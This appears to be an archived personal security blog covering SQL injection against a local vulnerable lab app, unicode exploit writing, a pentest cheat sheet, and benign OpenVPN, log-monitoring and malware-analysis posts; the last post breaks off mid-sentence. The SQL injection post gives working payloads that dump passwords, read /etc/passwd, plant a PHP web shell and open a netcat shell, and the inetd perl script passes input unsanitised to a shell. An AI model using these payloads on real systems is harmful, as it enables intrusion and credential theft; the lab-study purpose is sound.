For months and months i avoided this topic. I always assumed that this injection technique was minor and not high risk. So what if you loose email addresses and phone numbers, this stuff is pretty much public knowledge anyways right?(Google your email address and don't be too surprised by the result). Of course, at the time i knew absolutely nothing about sql injection and i was basing this on pure assumption. Well now that I've taken a good week to learn as much as i can about the topic i must say that i was overwhelmed by what can be accomplished by this attack. Trust me when i say that writing exploits for windows executables is cool and amazing. Sql injection doesn't fall short of coolness either and i would like to demonstrate this. This demonstration should give you an idea of what this attack is and why it is EXTREMELY dangerous.

Note: This is not a tutorial. Background knowledge of sql injection is required to follow. I recommend reading here or check some of the other resources at the end of the post to get a grasp of some of the concepts.

The vulnerable app i would be using here is a php website with a MySQL back-end. You can get the download here. It is know as exploit.co.il i believe.

Installation:
1. Extract the tar.gz file to your web root directory
2. Set up a new database either using CLI or phpMyAdmin and import the "exploit.sql" database
3. You will need to edit the database connection string which is located in a file named"config.php" in your web root folder and "config.php" in webroot/admin/ folderEdit this config file with your sql server address,user name,password and database name.Thats all, Now just browse to "localhost" or 127.0.0.1 to see the web site.

Assuming the website is up and running, we will test for the vulnerability on the newspage.php page. On the homepage click on one of the articles under the "latest news" section. Note the URL on the address bar "http://127.0.0.1/newspage.php?id=1" (note your id=value , parameter may differ based on your selection).

Now add a " ' " at the end of the URL; " http://127.0.0.1/newspage.php?id=1' ".
Notice that nothing fancy really happens. Typically, you would get a database syntax error message somewhere on the page, but the programmer of the website took the extra step to prevent this. This type of sql injection attack is usually classified as blind sql injection.

lets try to add a mysql comment character, "#", to the url; "http://127.0.0.1/newspage.php?id=1'#"
Nothing happened here.

Lets url encode the "#". This becomes "%23".
"http://127.0.0.1/newspage.php?id=1'%23".
Ah this here completed the query. You would notice this as the page returned information pertaining to this id number. This is a sign of the existence of an sql injection vulnerability. You can visualize the query being something like " select * from news where id='1' ". With our inject data, the query would look like this " select * from news where id='1' #' ". The %23 in the url was converted to "#", the comment symbol in mysql.

The following are steps that i took to enumerate information from the database. I would be manipulating the id= parameter in the url from now on.

Obtain the number of columns from the query. id=1' order by x %23 . Where x is the number of columns. Start with 1, then increment this number until the page returned is no longer valid. I learned that the number of columns returned by the query is 7
Determine where and what columns are displayed on the page. id=x' union all select 1,2,3,4,5,6,7 %23. You would notice that the third and seventh column are returned. We will use the 7th column to enumerate database information.
Enumerate the database name. id=x' union all select 1,2,3,4,5,6,database() %23. Database is exploit.
Enumerate the current user. id=x' union all select 1,2,3,4,5,6,current_user() %23. Current user is root :)
Enumerate the tables. id=x' union all select 1,2,3,4,5,6,table_name from information_schema.tables where table_schema=database() limit x,1%23. Where x is like an index to the table number. Limit 0,1 will return the first table, limit 1,1 will return the second table, limit 2,1 will return the third table and so forth.
Enumerate the columns. id=x' union all select 1,2,3,4,5,6,column_name from information_schema.columns where table_schema =database() and table_name='x' limit y,1. Where x is a table name that was obtained from step 5 and y is an integer index as discussed above when used with limit.
Now we can enumerate the data. We will enumerate the members table. The members table has three columns, id, username and password. We will get the usernames and their respective passwords. id=x' union all select 1,2,username,4,5,6,password from members limit x,1%23. Where x is used as an integer index value to the results of the query. You would soon notice that passwords are stored in plain text.
Reading files. id=x' union all select 1,2,3,4,5,6,load_file('/etc/passwd')%23. This will display the contents of the file /etc/passwd.
Lets drop a simple backdoor shell. This would only work where there is a directory with write permissions. Assuming /var/www/ has write permision by everyone we can create our backdoor php shell like this.
id=x' union all select 1,2,3,4,5,6,'<?php system($_GET[cmd]); ?>' into outfile '/var/www/shell.php' %23
If all went well, using your browser, goto http://127.0.0.1/shell.php?cmd=ls. This should list the current directory contents via the "ls" UNIX command.
Lets get a more interactive shell. Using the same shell.php script we wrote to the database server goto http://127.0.0.1/shell.php?cmd=nc -e /bin/bash -lvp 4444. This sets up a netcat backdoor.

Update: Here is a video demonstration on how most of this is done.

sql injection from aerokid240 on Vimeo.

Resources/Good Reading:
wikipedia
hakipedia.com
exploit.co.il vuln web site
unixwiz.net
securiteam.com
owasp.org

Challenges in developing unicode exploits

2011-06-29T09:09:00.000-07:00

In a precious post, i wrote about exploiting a stack buffer overflow for the vulnerable version of minishare (version 1.4.1). This was basically my interpretation and understanding of lupin's write up of the same exploit in tutorial form over here. If you need more elaboration on the exploit writing process, i suggest that you look at his tutorial on exploiting minishare (there are other tutorials as well). There is also a good tutorial at corelan.be on writing exploits. It was the tutorials over at corelan that got me into unicode exploits. This is a very length tutorial on unicode exploits that made me really understand the challenges in writing such an exploit.

Unicode exploits are basically the same as traditional stack buffer overflow exploits but it comes with a bigger challenge. The idea between both exploit types are the same; Overwrite EIP (or seh) with a useful address that would execute a command that jumps us back to our buffer that contains our code. Although their goals are the same, how you would go about achieving these goals differ.

The differnce that you would notice from the traditional ascii exploit and a unicode one is that every byte is appended with a null or 0x00 byte. For example, the string "DOG" in uppercase will be "44 4F 47" in ascii bytes. The unicode representation of the same string will be " 44 00 4F 00 47 00". So if when you overwrite a buffer with a crap load of AAAAAAAAA's, in a unicode exploit, each A in the buffer will be appened with a null. Therefore your buffer will look like this in bytes: "41 00 41 00 41 00 41 00 41 00 ...".

Usually with unicode exploits, you are quite limited in what memory addresses you can overwrite EIP or SEH with and you also have a limed instruction set in which you can use. You must accept that every byte in your supplied buffer will contain a trailing null byte and work your way from there. This also means that your buffer must contain code thats unicode compatible. For example, putting a short jump where the next seh address resides, i.e jmp 0x6, is common in seh exploits to jump over seh address towards your shellcode. This jmp 0x6 in bytes is " eb 06". If when send this in our buffer, the nulls will be appeneded to each byte before the code is run, i.e "eb 00 06 00" . If you look at the instructions that these bytes represents, its not what you would've intended it to be. This is a major point that must be kept in mind when dealing with unicode exploits.

You must be wondering how do we overcome the limitations discussed earlier. You basically use unicode compatible instructions to accomplish the same thing. These instructions include single byte instructions like push, pop, inc, dec and ret just to name a few. When using single byte instructions, each instruction must be seperated by some nop-equivalent code in the form of "00 nn 00" where nn will be an opcode that will give the effect of a nop instruction. There are not too many opcodes that we can use here. Some of them are 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x62 and 0x6D. These opcodes when used in the format "00 nn 00" will produce assembly instrunctions like "add byte ptr [ebp], ch". Replacing nn with one of the opcode bytes would produce something similar. For this to work however, the relevant register (ebp in our example) must contain an address which is writeable or else an exception will occur. Each opcode byte will normally result in giving you a different register at your disposal. Because the code that this produces probly would not affect our buffer (or shellcode), it can be used as filler or nop-like code in between single byte instructions and other relevant code pieces. If you need further elaboration of the uses on this, please read the unicode exploit over at corelan.be. They did a great job explaining this, but most importantly, they also walk you through developing an exploit using the above mentioned techniques.

Some things to keep in mind.

After you found that you can overwrite eip or seh, you will need to find a usable unicode compatible address, i.e, in the form of 00nn00nn. So in the case of an seh exploit, you gonna need to find an address to a pop pop ret (like in a typical seh exploit) but this address must be in the format of 0x00nn00nn. The pvefindaddr plugging for immunity debugger can automate this process.
Make use of single byte instructions like push, pop, inc, dec, and ret and seperate each with one of the nop-like opcodes i mentioned earlier (0x6D, 0x6E, 0x6F, 0x70, 0x71 etc. This will cause opcode to align itself in a way that is unicode compatible.
Shellcode must be encoded with unicode compatible encoder. You can also use metasploit for this: # msfpayload windows/exec CMD=clac.exe R | msfencode -e x86/alpha_mixed -t raw | msfencode -e x86/unicode_upper -t raw BufferRegister=EAX
Unicode encoders usually need you to have at least one register pointing to the begining of the shellcode. Here is an example of how this can be accomplished. Suppose we wanted to get the address of 0x00401030 into eax then jump to it. We can accomplish this like so:

Opcode: Assembly:

B8 00110011 MOV EAX,11001100
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
2D 00010011 SUB EAX,11000100
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
50 PUSH EAX
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
4C DEC ESP
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
58 POP EAX
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
05 00300040 ADD EAX,40003000
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
50 PUSH EAX
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
44 INC ESP
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
58 POP EAX
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
C3 RETN

If we were to see this as a stream of bytes, it would look like "B8 00 11 00 11 00 6D 00 2D 00 01 00 11 00 6D 00 50 00 6D 00 4C 00 6D 00 58 00 6D 00 05 00 30 00 40 00 6D
00 50 00 6D 00 44 00 6D 00 58 00 6D 00 C3"

This is unicode compatible code, often known as venetian code. Remember when you are writing your exploit, you will not be including the null bytes. These would get automatically inserted for you when your exploit overflows the buffer.

Automate log monitoring and get email notifications with swatch

2011-06-04T12:11:00.000-07:00

The swatch program (simple watcher) can monitor all sorts of logs and respond to certain events when they occur. Its concept is quite simple. Swatch will monitor a logfile for us , for example, /var/log/syslog, and when a specific event occurs (these events are configured in the swatch config file) and are logged in the log file, swatch can respond by executing a program, sending an email to a sysadmin or sending messages to the console where swatch is being run.

A simple example of swatch in action. If you are the sole sysadmin of a webserver, you would probly want to be notified if someone attempts to try to log into your server (could be over ssh or other authentication services). Being the sole admin of the webserver, no one else should have any business being on the system. Anyone but the admin attempting to login to the system obviously doesn't belong there and may have bad intentions. In this case, you can set up swatch to monitor the auth.log file for failed logon attempts and succesful logon attempts and then send you an email whenever their is attempts from anyone to log in. Of course this will notify you even when you log on to the machine, therefore this might be more practical if you have an unattended system (maybe you are on vacation or away on business).

I use an email program which is actually a perl script, called sendemail. On a debian based system, you can install it via apt-get install sendemail. Likewise, to install swatch, apt-get install swatch. Once both are installed, a simple configuration for swatch is as follows

watchfor /sshd/
echo bold
bell 3
exec "/usr/bin/sendemail -s smtp.live.com:25 -f youremail@hotmail.com -xu youremail@hotmail.com -xp your_hotmail_pass -u "Log alert" -m "Possible SSHD login attemp" -t youremail@hotmail.com -s smtp.live.com"

Save the above to a text file with an appropriate name such as swatch.conf

Then we can execute swatch like this:
# swatch --config-file=/path/to/swatch.conf --script-dir=/path/to/your_config_dir --examine=/var/log/auth.log

Whenever someone attempts to login to your sshd server, the sshd daemon will log the login attemp in /var/log/auth.log. The swatch program will monitor the auth.log file for the string sshd and whenever it gets a match, it will leave a notification on the console and then send an email to youremail@hotmail.com. The swatch program understands regex expressions so you can perform more advanced matches instead of a simple string like sshd.

OpenVPN Cont. - Adding username/password authentication to openvpn

2011-05-31T08:59:00.001-07:00

This post basically adds onto the steps outlined in the previous post. By adding username/password authentication, you are essentially providing a two factor authentication mechanism to your openvpn server. The client would need a usable client certificate and key to authenticate itself to the server, as well as provide a valid username and password.

We have already discussed using certifcate authentication in the previous post so i wont be going over that here. To add the user/pass mechanism we would be adding to our already existing configuration files one or two lines.

In the server config file, add the following:
plugin /usr/lib/openvpn/openvpn-atuh-pam.so system-auth

On the server create a group called vpn
# groupadd vpn

Then we can create each user:
# useradd -s /bin/false -g vpn vpntest // this creates the user and puts them in the vpn group
# passwd vpntest // gives the user vpntest a password for authentication

On the client config file, add the following:
auth-user-pass
pull

Thats it. Keep in mind that we were adding to our config files from the previous post, so it is presumed that you already have a working openvpn server that accepts client key/certificate authentication

Resources/Good Reading:
http://www.uno-code.com/?q=node/120

OpenVPN configs made easy

2011-05-28T17:20:00.000-07:00

If you are reading this, i'm assuming that you would already know what a VPN is. If you are not familiar with the term, you can read this Wikipedia entry to get up to speed with the technology.
This guide would not be a full featured guide on how to setup the "complicated" openvpn software. For quite sometime now, i have avoided Openvpn as i've always read about how hard it is to setup up and configure. I've used other VPN technologies such as hamachi and adito. While these solutions are great, i've always felt like i was holding myself back by not giving Openvpn a chance. After following some tutorials, some quite simple and others very complex, i am happy to say that i've finally set up Openvpn server. The best thing that i have taken from this experience is that its not all that hard to set up. There are guides out there that seem very intimidating on the topic and my hope is to try and take this confusion away and give you the quick 101 of openvpn.

---+++Using openvpn with secret key.+++---

I've used Backtrack 5 to setup my server (you can use other linux distros as well)

Install Openvpn. Backrack 5 already comes with it pre-installed. If your distro didn't come with it already install, you can install by issuing # apt-get install openvpn (applicable for debian based systems that use apt for managing packages)
Navigate to openvpns config dir. # cd /etc/openvp
Create a secret key. # openvpn --genkey --secret secret.key
By default no config file is available. Lets create one. # touch openvpn.conf
Using your favorite text editor, open up the config file that you've just created and enter in the following:

proto udp # protocol to use. Either tcp or udp
port 1194 # port num
dev tun # can be either tun or tap. Tun is simpler to sertup
ifconfig 10.0.0.1 10.0.0.2 # The 10.0.0.1 is the desired IP for our server's virtual interface and the other is the peer
secret /etc/openvpn/secret.key # secret key used for authentication
cipher AES-128-CBC # encryption cipher to use
user nobody # drop priveledges to this user
group nobody # same as above
verb 3 # logging level

Thats it for the server set up. Now copy the secret.key file and the openvpn.conf file to another linux client that already has openvpn installed. Note that the server and client config files are almost identical with few minor changes. Copy the files to the location /home/user/.openvpn (this location is not mandatory but lets just be organized).

First change permissions of config and secret key file. # chmod 644 secret.txt ; chmod 644 openvpn.conf
We need to add 1 line to the openvpn.conf file and modify the ifconfig parameter. So the client's openvpn.conf file will look like this

remote 192.168.0.5 # VPN's server's real ip
proto udp
port 1194
dev tun
ifconfig 10.0.0.2 10.0.0.1 # notice the change here
secret /home/user/.openvpn/secret.key
cipher AES-128-CBC
user nobody
group nobody
verb 3

Thats all for the client configurati0n.

Starting the server and client take identical commands and require root privileges. Onceyou are root, you can start the server and client like so: # openvpn --config /etc/openvpn/openvpn.conf

Once the connection is established both the server and client terminal windows should give some details similar to this:

Sat May 28 20:53:16 2011 Initialization Sequence Completed

To test your VPN connection, you can use the ping utility.

---+++Using openvpn with certificates.+++---

Server setup:

Copy scripts for handling certificates to /etc/openvpn directory. # cp -r /usr/share/doc/openvpn/examples/easy-rsa /etc/openvpn
Goto scripts dir. # cd /etc/openvpn/easy-rsa/2.0
Modify the "vars" file. The variables that you want to modify are at the bottom of the file. These include KEY_COUNTRY, KEY_PROVINCE etc.
After modifying the vars file, issue this command on the file. # source ./vars
Clean up older keys. # ./clean-all
Create CA key and certificate. # ./build-ca
Create the openvpn server's certifcate and key. # ./build-key-server openvpn_server
Create client keys and certificates. # ./build-key client1
Create dh key. # ./build-dh # this can take a 2-4 mins to create. Move your mouse around an be patient :)
Goto keys directory. # cd keys
Copy the dh1024.pem, ca.crt, openvpn_server.crt and the openvpn_server.key files to /etc/openvpn/ directory
Lets create our server config file:

tls-server # this would be the server in tls mode
proto udp # protocol to use. Either tcp or udp
port 1194 # port num
dev tun # can be either tun or tap. Tun is simpler to sertup
ifconfig 10.0.0.1 10.0.0.2 # The 10.0.0.1 is the desired IP for our server's virtual interface and the other is the peer

ca /etc/openvpn/ca.crt
cert /etc/openvpn/openvpn_server.crt
key etc/openvpn/openvpn_server.key
dh etc/openvpn/dh1024.pem

cipher AES-128-CBC # encryption cipher to use
user nobody # drop priveledges to this user
group nobody # same as above
verb 3 # logging level

Client setup:

Copy the ca.crt, client1.crt and the client1.key files to the client
Create its config file:

tls-client # this would act as client in tls mode
remote 192.168.0.5 # VPN's server's real ip
proto udp
port 1194
dev tun
ifconfig 10.0.0.2 10.0.0.1 # notice the change here

ca /home/user/.openvpn/ca.crt
cert /home/user/.openvpn/client1.crt
key /home/user/.openvpn/client.key

cipher AES-128-CBC
user nobody
group nobody
verb 3

Again, starting the server and client take the same commands but you must have root privileges. Once you are root, you can start the server and client like so: # openvpn --config /etc/openvpn/openvpn.conf

Once the connection is established both the server and client terminal windows should give some details similar to this:

Sat May 28 20:53:16 2011 Initialization Sequence Completed

To test your VPN connection, you can use the ping utility and ping each node.

Extra:

If you want revoke client keys:
# ./revoke-full client1

This would add client1 to a sort of black list that would not allow them to connect to our VPN anymore. The file that houses this black list is crl.pem. Create a hardlink (ln without the -s option)to this file in the /etc/openvpn/ directory.

You would also need to add this line to the configuration file on the server. This causes the server to check its revocation list whenever clients try to establish a connection to the VPN server.

crl-verify /etc/openvpn/crl.pem

I noticed that when a revoked client tried to connect to the vpn, not only were they denied service, the VPN server was also shutting down. It seems like the when openvpn shuts the connection down, it tries to reinitialize its tun interface, but fails to do so because in our config file, we dropped our priveledges to nobody. This issue is quickly resolved by commenting out or deleting the lines with the parameters user and group on the server config file.

Resources/Good Reading:
http://openmaniak.com/openvpn_tutorial.php
http://www.adamsinfo.com/quick-linux-and-windows-openvpn-howto-and-tutorial-including-vpn-routing/

Vicompress: http proxy server

2011-05-23T15:41:00.000-07:00

Vicompress is an http proxy server, with the ability to cache requests in memory. It has a small footprint but because of its ability to cache contents in memory, it can eventually use up tons of memory resources. It has decent log statistics capabilities too and outputs to an html formatted page. Most important to me, setup and configuration is quite simple.

Installation:

1 . Download the installation package from visolve website. In my case, i downloaded the .deb version of the package.

2. To install i used the command: # dpkg -i package-name

Configuration:

For details on all configuration parameters, go here

The default configuration would do just fine, but its useful to learn of its parameters
Here is a snapshot of my vicompress.conf configuration file:

listen 0.0.0.0 8080
outgoingip 0.0.0.0
enable_compression yes
enable_caching yes
cache_memory 200
max_cacheditem_size 10000
cache_expires 2
enable_dns_caching yes
dns_expires 2
user nobody
rotatesize 10
logformat squid
enable_debug no
accesslog /usr/local/vicompress/log/accesslog
errorlog /usr/local/vicompress/log/errorlog
errorpage /usr/local/vicompress/etc/errorpage.html
logstats /usr/local/vicompress/logstats

To start the server: # /usr/local/vicompress/bin/vicompress.sh start

To view the statistics of your proxy server, usually a report gets generated every hour. You can speed this process by issueing this command:

# cd /usr/local/vicompress
# ./bin/update_log_stats /log/accesslog logstats

To view the report issue: # firefox /usr/local/vicompress/logstats/statsindex.html

Resources / Goodreading:
visolve

Inetd and perl

2011-05-14T05:24:00.000-07:00

Just a quick simple trick that you can help you set up servers quick and easy. You don't have to know alot about programming either but it helps to know what Inetd is in linux.

Inetd, on its manpages is known as a internet superserver. All those big words aside, it can basically listen on a given port for you and when a connection comes in, it calls the appropriate application to handle them. It so turns out that you can use Inetd's sockets for network communication instead of programming your own. What that means is that inetd can listen on port 80, and when a connection comes in on that port, we can run a shell script that simply sends back some text or html tags. Inetd's output is piped to the calling program or script's standard input and that program's output is redirected to Inetd's standard input.

Lets quickly demonstrate this with a bash script.

#!/bin/bash
echo "Hello World"

Now save that script to a file called hello.sh and give the file executable permissions.
# chmod 555 hello.sh

Now configure /etc/inetd.conf as follows

http-alt stream tcp4 nowait root /root/hello.sh

Now save the file.

Run the inetd daemon
# /etc/init.d/inetutils-inetd start

now netcat to port 8080 (which is what http-alt) service is and you should revecieve a response:

root@bt~#: nc 127.0.0.1 8080
Hello World
root@bt~#:

All should work well if done right. Now to get a lil bit more fancy, i've put together a perl script that takes an input and returns the MD5 hash of that input (an MD5 hashing service if you will).

#!/usr/bin/perl -w

# A simple inetd socket server.

use strict;

my $old_fh = select(STDOUT);
$| = 1;
select($old_fh);
print "++ MD5 pass generator ++\n\n";
print "Type \'exit\' at anytime to quit\n";
print "Enter string to be hashed: ";

while( my $line = )
{
$line =~ s/\r?\n$//;
#chomp($line);
if ($line =~ /^exit$/)
{
die "shutting down\n";
}
# do your processing here!
$line = `echo -n $line | openssl md5`;
print "$line\n";
print "Enter string to be hashed: ";
}

Save the perl script to a file like md5.pl and chmod 555 your file.
Start the inetd daemon as shown above and use netcat to connect to the service :)

Backtrack 5 is out

2011-05-14T05:17:00.000-07:00

Backtrack 5 is out folks. Head on over to the backtrack website to get yourself a copy of this well put together masterpiece. There are 32 and 64 bit versions available now, as well as the classic KDE styled version and a new GNOME version, which put you in an Ubuntu like environment. I've decided to go with the Gnome version, as im use to Ubuntu and it was refreshing to use something other than the classic desktop environment. All versions should have the same tools and capabilities so its all a matter of preference.

What are you waiting for? Get your copy here.

Usefull malware analysis tools

2011-04-13T06:04:00.000-07:00

Was reading some articles from an e-magazine @ haking9.org involving basic malware analysis techniques. Why would anyone (the average person) want to do this? Maybe some people just have alot of time on their hands or like me, just want to know how everything works. It is very important for anti-virus vendors to do malware analysis in order to produce signatures to identify the malware throughout scans. If you got some time on your hands, i suggest that you drop by hakin9.org and check out some of the articles including the ones relating to malware analysis.

Tools:

Regshot: This tool, as it names says, takes a snapshot of the regisrty. It basically gives you a baseline of what the registry looks like at that point in time. Given that baseline, you can then execute the suspicious executable, then take another registry snapshot. You are then able to compare both snapshots using regshot's compare feature to find out what keys have been added, modified or deleted. It has the option of outputing its results in a text file or a nicely formated HTML file.

Regmon: Like regshot, regmon is registry utility that operates in a slightly different manner. It has the ability to give real time analysis of what keys (and their location) currently running processes are accessing. It lets you know whether the process is querying information, creating new keys, setting values, etc. Just before you execute the malware, you can have regmon running in the background capturing its information. When the program has been executed, you can stop regmon's capture and perform your analysis. You would notice that while regmon was capturing data, it not only captured information for the malware process you are investigation, but also other processes as well that were recently accessing the registry. Thankfully, there is a nice filter feature that allows you to filter the captured data based on the process name. Although the filter is very limited, it is still beneficial to have. You can also look into another tool called procmon, who is the current successor of the tools regmon and filemon. It has the same capabilities of regmon and many more options. However, regmon still has its place and is simple to use and learn.

Filemon: This tool works in a similar fascion to regmon, but with files. It monitors processes that access files on the disk and log their actions(read, write, query, delete,etc) and whether they were successful or not. Like regmon, just before you execute the malware, you can have filemon running in the background capturing its information. When the target program has been executed, you can stop filemon's capture and perform your analysis.

Wireshark and Netcat: It is known that some malware tend to want to replicate themselves over the network. Some may try to covertly download software or try to log onto some IRC channel to query its commands (google: botnet). These tools are coded to work covertly, so while you're sitting at your desktop, you would not see any indication that anything is going on. Wireshark can help us understand the why, where, what, when and who questions. Why is the malware connecting out to port 4444; where is the malware trying to connect to; when or at what intervals does the malware initiate any type of network traffic; what is the malware trying to do or accomplish; who is involved (source IPs, mac addresses, domains etc.). Netcat can be set up to intercept this traffic in a proxy mode and also be used to interact/respond to services and requests.

Netstat and tasklist: Before analyzing any piece of malware, having a baseline is very vital. You are gonna need to have an idea of what the system looked like before and after the malware was run. Running netstat and tasklist before running the executable can give us a baseline of what network sessions are open and ports that are listening etc. while the tasklist command utility can give us a list of currently running processes. Tools that you can be use as well are sysinternal's process explorer and tcpview.

Debugger, Ollydbg: To really get in depth with exactly what the executable is doing, you will have to use a debbuger to step through the system opcodes and system calls. Using a debugger is not easy for most and can take a little bit of getting use to. However, to be good at malware analysis, you cannont escape not learning how to use a debugger like IDA pro or in my case, Ollydbg.

Virtual environment: To avoid potentially infecting your main system and possibly breaking your Windows OS, you will definitly want to perform most, if not all, your analysis in a virtual environment. Virtual machines also provides us with a mechanism to roll back a host to a snapshot of a system at an earlier time. This allows us to restore the state of a system to a point just before an event occured (say the malware caused the OS to no longer start up) withing minutes. There are quite a few options avaialble for virtualization but i myself use the Virtualbox technology. Remeber to check out the system requirements of these technologies before installing to your old pentium three laptop with 256 ram.

PE tools: Sometimes malware may be packed by common packer tools, like UPX. The benifit of using a packer on an EXE file is that it can allow for the compression of the executable. However, by doing so, the original exe's form is thus changed. Eventually, what you get is an exe within an exe. The outer layer exe will be the packers decompression code that decompresses the internal exe in memory and then executes it. The additional benifit of this is that it can make debugging of this packed executable a pain in the but. In order to properly debug the functionality of the packed executable, it must first be decompressed in order to be analyzed. Tools like PeID can help us identify a packed executable's packer. By knowing this, we can potentially in some cases use the same packer to unpack the executable back to its original form. Another PE tool that i use is Lordpe, which allows for the modifying of the PE headers of binary executables.

These are just some tools that can be utilized in malware analysis process. I encourage you to do your own research and look up the malware analysis articles in the hakin9.org website. The articles are available in PDF format and is a little bit difficult to directly link to :(

Resources/Good Reading:
hakin9

Windows and its PE file structure

2011-03-23T06:27:00.000-07:00

I'll start this post of by asking a question; WTF is a PE file? A PE file is something we use on a day to day basis when we use our computer systems. The files that have the ".exe" and ".dll" extensions are what we refer to as PE (Portable executable) files. A PE file contains one of the most complex file structures that i've ever seen and its very important to understand most, if not all of it if you want to be modify the binary file or become a reverse-engineer. Becasue there are so many structures, i can't go through them all (i don't even understand 50% of them) but i will try to focus on the most common ones.

For a visual of what the structure looks like, goto google images and search "PE file format".
Here is one that i found and usually reference: link

[ MZ header] - "hex bytes: 4d 5a"
[ Dos stub ] - "This program cannot be run in dos mode"
[PE header] - "Hex bytes: 50 45 00 00"
[optional header]
[Data directory] - "Structure of important locations such as import table, export table, etc."
[Section table header] - "array of structures describing the properties of each section."
[section 1]
[section 2]
[section n]

Every PE file should contain the above information. The very first two bytes of the file should be "4d5a", which is MZ. This indicates the start of the dos header. At position 0x3c in the Dos header, is a dword (4 bytes) that indicates the offset of the start of PE header. Directly after this should be the DOS stub that basically prints a string saying that this program cannot be run in dos mode or something similar.

Following the dword offset at positon 0x3c should take you to the start of the PE header and should containt the hex bytes "50 45 00 00". Other useful information contained in here include . the machine type (i386, i686, etc.) , the number of sections and size of optional header.

24 bytes from the PE header starts the Optional header. This structure is in every PE file and isn't really optional as it may suggest. It contains many relevant fields that the windows loader needs in order to load the file correctly into memory.

The data directory is a listing of the locations of important data such as the import tables (when you use functions from windows DLLS, you have to import them.) and export tables.

Section header is a structure containting the properties of each section. This information includes its name, its size on disk and in memory and its location.

The last sections will house the individual sections referenced in the section header. You can use the information in the section header to find the relevant offsets and size of each section.

Custom wordlist

2011-01-30T19:14:00.000-08:00

Heres two ways to create custom wordlist with backtrack 4 R2.

Tools:

wyd.pl

cewl.rb

Way #1:

# wget -r -l 3 http://www.google.com

'-r' recurse
'-l' recusrsion depth level

# wyd.pl -o wordlist.lst /root/http://www.google.com

or

Way #2

ruby cewl.rb --depth 3 -w ~/wordlist.lst http://www.google.com

Pentest Cycle Quick Reference

2010-12-22T12:00:00.000-08:00

Reconnaisance: Normally no active tests are performed on targets. At this phase google is your friend. You try to learn all you can about potential organizations/targets from available public sources

Scanning: This phase involves identifying live targets and their open ports on a network.

unicornscan 10.0.0.1
nmap -sS 192.168.1.1-255; nmap -sn -Pr 192.168.1.0/24
netdiscover -r 10.0.0.0/24 -i eth0

Enumeration/OS fingerprinting: Learn more about the potential applications listening behind discovered open ports. This involves sending packets to open ports and analyzing the responses sent back by the services. By analyzing these responses the OS might be determined here as well.

nmap with the -sV and or -O option
amap -Abqv 10.0.0.1 80; amap -B 10.0.0.1 80
xprobe2 -p tcp:445:open
httprint for webserver enumeration
metasploit and smb_version module if port 445 or 139 is open
nmap --script smb-os-discovery

Research: After identifying the OS and it's applications (and in some cases their versions), you will want to research that app for potential vulnerabilities and security bypasses. Some resources that you can use to research vulnerabilities are

www.securityfocus.com
www.exploit-db.com
www.secunia.com
www.google.ca

Exploitation: After finding potential vulnerabilites and exploits in your research phase, you will want to attempt to try these exploits against the vulnerable apps. In some cases you will be required to compile and or modify the exploit code to get things working or to simply suit your need. Some tools that aid in the exploitation phase are:

metasploit
www.exploit-db.com or a local copy of their archive as found in backtrack 4
local copy of milworm exploits archive
fasttrack
milw0rm
SET, i.e, social engineering toolkit

Maintaining Access: After you have successfully exploited a target, you will want tEo ensure that access to the remote vulnerable host will be quick and easy. You may be required to open a port in the firewall or just turn that darn thing off. Some tools that can be used here are;

netcat
cryptcat
mirkov
guptachar (see blogpost)
metsvc (meterpreter)
rootkits

Clearing Tracks: This step basically involves clearing traces of your activity on the vulnerable machine, including uploaded files and any events that may have been logged to the event viewer that may idicate that the machine has been compromised. Rootkits can also help hide your upload files, your open ports, running services, etc. These are very difficult to detect and mitigate.

These are just guidelines that i've learnt from various resources. The majority of pentesters out there tend to follow similar guidelines to those that i've outlined. There are many more tools that can be utilized in each phase but that was not the purpose of this blog. It is important to have an idea of the overal phases that one may encouter in real life and why each is important. I did not go into much depth but each phase has their value. It is very important to know your tools, to practice using them and when to use them, as your experience can be the deciding factor in whether you get in or whether you serve yourself a serving of fail.

Single Packet Authentication with fwknop

2010-11-25T17:26:00.000-08:00

Imagine having services running on your computer, in order for other machines to access these services you would have to open up the relevant ports on your firewall. What if a zero day exploit comes out for one of these services is it game over? More than likely it is a game over situation, but it doesn't have to be.

Single Packet Authentication allows you to access services running on your machine and at the same time have your firewall filter block all incoming traffic, meaning have no ports open on your machine. How is this even possible? It just is and to learn more, google is your friend. Basically, you have a server but its no ordinary server running on your machine. Its a server that listens to all traffic like a sniffer. When it sees a specially crafted authentication packet it does something like execute commands or in our case open up a port. Whats kool about this and in particular fwknop is that we can setup our rules that when we open up the port, we do so for a certain amount of seconds then close back the port of the firewall. The already established connections continue to have connectivity (due to rules we set on the firewall to allow already established communications through).

Notes:

OS: Backtrack 4 RC1

Simple IP tables firewall rule:

#!/bin/sh
IPTABLES=/sbin/iptables
$IPTABLES -F
$IPTABLES -F -t nat
$IPTABLES -X
$IPTABLES -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A INPUT -i ! lo -j LOG --log-prefix "DROP "
$IPTABLES -A INPUT -i ! lo -j DROP
$IPTABLES -A FORWARD -i ! lo -j LOG --log-prefix "DROP "
$IPTABLES -A FORWARD -i ! lo -j DROP
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "iptables policy enabled"
exit

pre-requisite for fwknop:
# apt-get install libgdbm-dev

Download and install fwknop(client and server)
# wget -c http://www.cipherdyne.org/fwknop/download/fwknop-2.0.0rc2.tar.gz
# tar -zxvf fwknop-2.0.0rc2.tar.gz
# ./configure
# make
# make install

Configuration: (config files are located at /usr/local/etc/fwknop)

In the fwknop.conf file, you need to uncomment and set the option for your interface "PCAP_INTF eth0".

Set up your access.conf file to allow access to what users what ports, etc. A simple suitable config:

SOURCE: ANY;
KEY: 123456789; //must be over 8 characters
REQUIRE_USERNAME: admin;
OPEN_PORTS: tcp/22;
FW_ACCESS_TIMEOUT: 20;

To run the server:
# fwknopd -f -vv

if you get the following error message when you try to run the server:

